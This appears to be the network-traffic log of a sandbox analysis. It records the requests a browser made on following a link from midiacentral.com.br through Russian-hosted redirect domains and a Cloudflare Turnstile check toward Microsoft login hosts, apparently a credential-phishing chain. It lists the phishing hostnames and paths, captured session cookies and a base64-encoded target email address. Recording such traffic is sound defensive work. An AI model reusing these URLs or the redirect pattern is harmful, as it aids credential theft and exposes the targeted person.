Source: global trafficHTTP traffic detected: GET /oslksedhlabd/gyu/wio/blip/sepla/Gina/bWR1bm5AZ2VvaW5zaWdodHMuY29t HTTP/1.1Host: midiacentral.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: midiacentral.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/Gina/bWR1bm5AZ2VvaW5zaWdodHMuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /VDb0pu/ HTTP/1.1Host: l4u8.yaalwgyl.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://midiacentral.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: midiacentral.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901f629158744368&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: l4u8.yaalwgyl.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://l4u8.yaalwgyl.ru/VDb0pu/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhMZ0Fmc0d3T2M0SFJaV0IvZTdGUFE9PSIsInZhbHVlIjoiUy9TQ0gwZnlxZkNRellWVkdkcGpiSjd2eU5NUFhIT0g3ODFTMFRvYVF5V01DTldLdkJUZnNHaytFcGN3cmVaaXAxSnNZV0V3aTZKTHZON3BYMENVMms1Um9ScFFEUm5vUU5aUlpuV3c0WVQ1elRSY2lSMldLY2hISDNOTHpzMHciLCJtYWMiOiI4MDY5NTI3ZWIxZWUyYzk4ZGRhOGViZmU3NzY1MTY2MDQ4Y2M4YWI1MjIzYzE1YzFmM2FjMDU4MzI3M2MwZWUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ild1L3BoUlQ4aDh3MlBieEdOMkd4MHc9PSIsInZhbHVlIjoia0k5bHVjWEI0WEtsanpyZEJ3WEpHNktQZU9aQnd1bE82YXhYTkNJbndseWhYZVVDRjdGRE5iUzZIZUhxTXhBTVFMNGU0Lzcxek1tVVB0MUlraGhuWVRBelc5alo5a01HMXpxTlVOMGhDcWUxUzBRcE12dlE2aHV6NUV2QlN4TDYiLCJtYWMiOiJjZThjM2Q2NmU3NjZmMjhmN2Y2YjkxMzBkNGZjNzg1NTE3NDY4MGZhZDJkYmUzNGI4OTVmNThhZTViYzExNjNkIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901f629158744368&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901f629158744368/1736876154281/IuOmzKH2y67OPFE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901f629158744368/1736876154281/IuOmzKH2y67OPFE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/901f629158744368/1736876154284/ec57144d90bb744d1c02edc23d2623a0823523ab9016e4cd96b09d4bae1b2468/bC7VENOcp4MpmX5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901f65a8b89443b1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901f65a8b89443b1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901f65a8b89443b1/1736876280904/UrY5Jca_bDVuSZT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901f65a8b89443b1/1736876280904/UrY5Jca_bDVuSZT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/901f65a8b89443b1/1736876280907/eea66730b6a61ae8c7ed035899ba9e6fe26b348cd88b3fd403431b589468ed87/JNwjWWWvzjZMojk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHAC HTTP/1.1Host: wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://l4u8.yaalwgyl.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://l4u8.yaalwgyl.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /XguRQyGirCoCfFLdTCFAUEEHJYDVUYACVLBCQIPCIRGZZIVMBLDKKAZHAC HTTP/1.1Host: wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: api.mixpanel.com
Source: global trafficDNS traffic detected: DNS query: midiacentral.com.br
Source: global trafficDNS traffic detected: DNS query: l4u8.yaalwgyl.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3201sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 17:35:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag3ws%2FF985H0zq9wg89%2Fkx5rND%2BlmktGl1PoKGTjJVe9%2FjUG4%2BOgsWS%2BPyAHI6phcId9L%2FSqpY0ymK60ZKyqePHZXQkiFqkyLpiZaHl0E1BFhmlev3DiI56lsBqMIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5565&min_rtt=5553&rtt_var=1586&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2229&delivery_rate=504606&cwnd=251&unsent_bytes=0&cid=72797853cace236b&ts=170&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 901f62988d568ce8-EWRserver-timing: 